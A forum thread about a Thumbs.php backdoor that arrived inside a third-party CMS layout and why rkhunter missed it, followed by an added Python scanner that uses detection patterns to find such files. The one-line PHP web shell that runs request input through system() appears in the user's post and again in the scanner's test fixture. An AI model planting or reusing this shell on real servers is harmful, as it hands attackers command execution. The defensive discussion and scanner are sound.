Why did rkhunter not detect this backdoor?

Discussion in 'Developers' Forum' started by lanceq, Feb 25, 2012.

  1. lanceq

    lanceq New Member

    Hello,
    Yesterday someone sent me the layout of the CMS. I uploaded it to my server; included in the layout was a backdoor Thumbs.php file. This file contains:
    Code:
    <pre><body bgcolor=silver><? @system($_REQUEST["v"]); ?></body></pre>
    It seems to me that this is exactly this backdoor:

    http://www.xakep.ru/magazine/xa/124/038/1.asp

    This person has executed this script via adress.com/layout/layoutname/img/Thumbs.php and removed all the files in that directory.

    I have ISPConfig 3.0.4.3. Why did rkhunter not block this backdoor?
    I thought these programs with ISPConfig would protect me from the backdoor.
     
  2. falko

    falko Super Moderator Howtoforge Staff

    First, rkhunter doesn't remove anything - it just detects malware, trojans, etc., and warns you.

    Second, it doesn't check PHP scripts (how should this work? How should it know the hash of a bad PHP script that someone uploads to your server?).
     

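As falko's reply says, a hash-based rootkit checker cannot know an arbitrary uploaded PHP script. The sketch below is an added example, not part of the thread and not rkhunter or ISPConfig code: it shows two content heuristics that do flag the Thumbs.php quoted above (an execution function called directly on request input, and PHP inside a static-asset directory). The directory names, function names and the sample tree are assumptions constructed for the example.

```python
import re
import tempfile
from pathlib import Path

# Heuristic 1: a command/code execution sink called directly on request input.
EXEC_ON_INPUT = re.compile(
    r"\b(system|exec|shell_exec|passthru|popen|proc_open|eval|assert)\s*\("
    r"[^;]*\$_(REQUEST|GET|POST|COOKIE)\b",
    re.IGNORECASE,
)
# Heuristic 2: PHP inside directories meant for static assets (assumed names).
ASSET_DIRS = {"img", "images", "css", "uploads"}
PHP_SUFFIXES = {".php", ".phtml", ".php5"}

def scan_file(root: Path, path: Path) -> list:
    dirs = {p.lower() for p in path.relative_to(root).parts[:-1]}
    findings = []
    if path.suffix.lower() in PHP_SUFFIXES and ASSET_DIRS & dirs:
        findings.append("php-in-asset-dir")
    with path.open("rb") as fh:  # read bytes so binary images cannot break decoding
        text = fh.read(1 << 20).decode("latin-1")
    if "<?" in text and EXEC_ON_INPUT.search(text):
        findings.append("exec-on-request-input")
    return findings

def scan_tree(root) -> dict:
    root = Path(root)
    results = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            findings = scan_file(root, path)
            if findings:
                results[path.relative_to(root).as_posix()] = findings
    return results

def demo() -> dict:
    # Constructed tree: the thread's Thumbs.php next to two benign files.
    with tempfile.TemporaryDirectory() as tmp:
        img = Path(tmp, "layout", "layoutname", "img")
        img.mkdir(parents=True)
        (img / "Thumbs.php").write_text(
            '<pre><body bgcolor=silver><? @system($_REQUEST["v"]); ?></body></pre>')
        (img / "logo.png").write_bytes(b"\x89PNG\r\n\x1a\n\x00\x00")
        Path(tmp, "layout", "index.php").write_text(
            '<?php echo htmlspecialchars($_GET["page"]); ?>')
        return scan_tree(tmp)
```

Pattern matching like this only catches plain, unobfuscated scripts; it complements, rather than replaces, reviewing third-party layouts before upload and disabling PHP execution in asset directories.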